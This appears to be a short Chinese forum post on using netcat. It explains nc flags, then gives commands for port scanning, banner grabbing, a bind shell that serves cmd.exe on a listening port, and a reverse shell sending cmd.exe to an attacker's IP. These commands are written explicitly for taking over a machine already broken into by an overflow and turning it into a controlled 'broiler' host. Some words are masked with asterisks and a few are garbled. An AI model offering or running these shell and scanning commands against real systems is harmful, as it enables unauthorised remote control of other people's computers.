参数解释:

  -e 程序重定向

  -t 用telnet来回应

  -l  监听本地端口

  -p  指定本地端口

  -v  获得端口信息

  -vv  获得详细的端口信息

  -z  关闭输入输出

  -n  指定IP地址

  -w 设定超时时间

  -u  UDP端口

  我就知道这么些参数 了:

  第一个:

  nc -l -v -p 7626

  这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河***的人会认为你中了***开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了.

  如果要监视是否有***本地80端口的行为,并记下来,用这个命令:

  nc -l -p 80 >>c://日志.dat

  这样,凡是有针对本机80端口的***都会被记录下来的.

  二、

  如果你通过溢出进入了别人的机器,就可以运行:

  nc -l -p 123 -e cmd.exe

  或者是: nc -l -p 123 -t

  作用都是以cmd.exe来响应到机器上123端口的连接.

  这样就把溢出的主机变成了一台telnet肉鸡了!

  你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 .

  在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777

  再在本地机器上运行: nc -l -p 777

  意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。

  你再在本地机上监听777端口,这样就进入了对方的cmd了。

  这也微十时毫 反弹端口式***的原理了。

  三、

  用这个命令:

  nc -v 192.168.0.25 80

  就获得了192.168.0.25的80端口的信息。

  可以获得IIS版本等很多重要信息 的 。

  四、

  你也可以将NC作为扫描器使用:

  nc -v -z 192.168.0.25 1-100

  扫描192.168.0.25的1到100间的TCP端口

  用nc -v -z -u 192.168.0.25 1-100

  这是扫描1到00间的UDP端口。

  这些就是我这几天悟出来的。

  大家还有心得什么没有啊!